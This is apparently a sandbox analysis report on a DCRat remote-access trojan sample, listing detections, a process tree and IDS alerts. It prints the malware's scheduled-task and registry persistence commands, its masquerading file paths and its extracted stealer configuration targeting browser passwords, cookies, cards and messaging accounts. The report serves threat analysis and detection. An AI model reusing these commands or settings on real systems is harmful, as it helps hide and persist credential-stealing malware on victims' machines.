Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5U9CuGu1ru.exe

Overview

General Information

Sample name:5U9CuGu1ru.exe
renamed because original name is a hash value
Original sample name:752748b4c26423542f08b2d3bdd47a42.exe
Analysis ID:1531316
MD5:752748b4c26423542f08b2d3bdd47a42
SHA1:5c36c76818a268e3ba45ba9de7dab600a66f966e
SHA256:56ec30189e1468de16c9e8d39908ca3428033e516a6d2fcb843963a4d36c43fe
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5U9CuGu1ru.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\5U9CuGu1ru.exe" MD5: 752748B4C26423542F08B2D3BDD47A42)
    • wscript.exe (PID: 3944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • containerdll.exe (PID: 748 cmdline: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe" MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)
          • schtasks.exe (PID: 5244 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1876 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1264 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4140 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1276 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 5 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5068 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4436 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3332 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4984 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7060 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2300 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3692 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 368 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3808 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3280 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 984 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1360 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 652 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1248 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3332 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4984 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7060 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3652 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 368 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5416 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6408 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6168 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5956 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • wscript.exe (PID: 3140 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • spoolsv.exe (PID: 6416 cmdline: C:\Users\Public\Desktop\spoolsv.exe MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)
  • spoolsv.exe (PID: 1292 cmdline: C:\Users\Public\Desktop\spoolsv.exe MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)
  • cleanup
{"SCRT": "{\"o\":\"^\",\"R\":\" \",\"v\":\"`\",\"J\":\"_\",\"t\":\"%\",\"H\":\"<\",\"w\":\"&\",\"V\":\",\",\"i\":\"#\",\"z\":\".\",\"c\":\"~\",\"y\":\"@\",\"U\":\"|\",\"S\":\"!\",\"j\":\">\",\"9\":\"$\",\"C\":\"-\",\"h\":\"(\",\"M\":\";\",\"X\":\")\",\"Y\":\"*\"}", "PCRT": "{\"l\":\"(\",\"v\":\">\",\"Z\":\"$\",\"U\":\".\",\"R\":\"_\",\"N\":\")\",\"D\":\";\",\"p\":\"!\",\"e\":\"^\",\"1\":\"<\",\"Q\":\"%\",\"d\":\"`\",\"Y\":\"&\",\"r\":\"#\",\"b\":\"@\",\"V\":\"-\",\"C\":\" \",\"o\":\"|\",\"W\":\"~\",\"5\":\"*\",\"B\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-YZYb6LRlx5C8eOzAhzqa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 7 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Desktop\spoolsv.exe, CommandLine: C:\Users\Public\Desktop\spoolsv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Desktop\spoolsv.exe, NewProcessName: C:\Users\Public\Desktop\spoolsv.exe, OriginalFileName: C:\Users\Public\Desktop\spoolsv.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\Desktop\spoolsv.exe, ProcessId: 6416, ProcessName: spoolsv.exe
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetFilename: C:\Users\Public\Desktop\spoolsv.exe
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Desktop\spoolsv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\Desktop\spoolsv.exe, CommandLine: C:\Users\Public\Desktop\spoolsv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Desktop\spoolsv.exe, NewProcessName: C:\Users\Public\Desktop\spoolsv.exe, OriginalFileName: C:\Users\Public\Desktop\spoolsv.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\Desktop\spoolsv.exe, ProcessId: 6416, ProcessName: spoolsv.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WHqeodkmYpJedFVKZpNEincEtJvAcD
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f, CommandLine: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ParentProcessId: 748, ParentProcessName: containerdll.exe, ProcessCommandLine: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f, ProcessId: 5244, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ParentProcessId: 748, ParentProcessName: containerdll.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, ProcessId: 4140, ProcessName: schtasks.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ParentProcessId: 748, ParentProcessName: containerdll.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, ProcessId: 4140, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T01:26:54.654343+020020341941A Network Trojan was detected192.168.2.550001141.8.197.4280TCP
            2024-10-11T01:27:40.031323+020020341941A Network Trojan was detected192.168.2.549852141.8.197.4280TCP
            2024-10-11T01:27:50.846279+020020341941A Network Trojan was detected192.168.2.549922141.8.197.4280TCP
            2024-10-11T01:28:02.466335+020020341941A Network Trojan was detected192.168.2.549986141.8.197.4280TCP
            2024-10-11T01:28:15.940338+020020341941A Network Trojan was detected192.168.2.549989141.8.197.4280TCP
            2024-10-11T01:28:31.034050+020020341941A Network Trojan was detected192.168.2.549992141.8.197.4280TCP
            2024-10-11T01:28:38.751948+020020341941A Network Trojan was detected192.168.2.549995141.8.197.4280TCP
            2024-10-11T01:28:53.021348+020020341941A Network Trojan was detected192.168.2.549998141.8.197.4280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 5U9CuGu1ru.exeAvira: detected
            Source: C:\Recovery\ShellExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Default\Documents\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Public\Desktop\spoolsv.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\kVQjSoqMfO.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"o\":\"^\",\"R\":\" \",\"v\":\"`\",\"J\":\"_\",\"t\":\"%\",\"H\":\"<\",\"w\":\"&\",\"V\":\",\",\"i\":\"#\",\"z\":\".\",\"c\":\"~\",\"y\":\"@\",\"U\":\"|\",\"S\":\"!\",\"j\":\">\",\"9\":\"$\",\"C\":\"-\",\"h\":\"(\",\"M\":\";\",\"X\":\")\",\"Y\":\"*\"}", "PCRT": "{\"l\":\"(\",\"v\":\">\",\"Z\":\"$\",\"U\":\".\",\"R\":\"_\",\"N\":\")\",\"D\":\";\",\"p\":\"!\",\"e\":\"^\",\"1\":\"<\",\"Q\":\"%\",\"d\":\"`\",\"Y\":\"&\",\"r\":\"#\",\"b\":\"@\",\"V\":\"-\",\"C\":\" \",\"o\":\"|\",\"W\":\"~\",\"5\":\"*\",\"B\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-YZYb6LRlx5C8eOzAhzqa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, 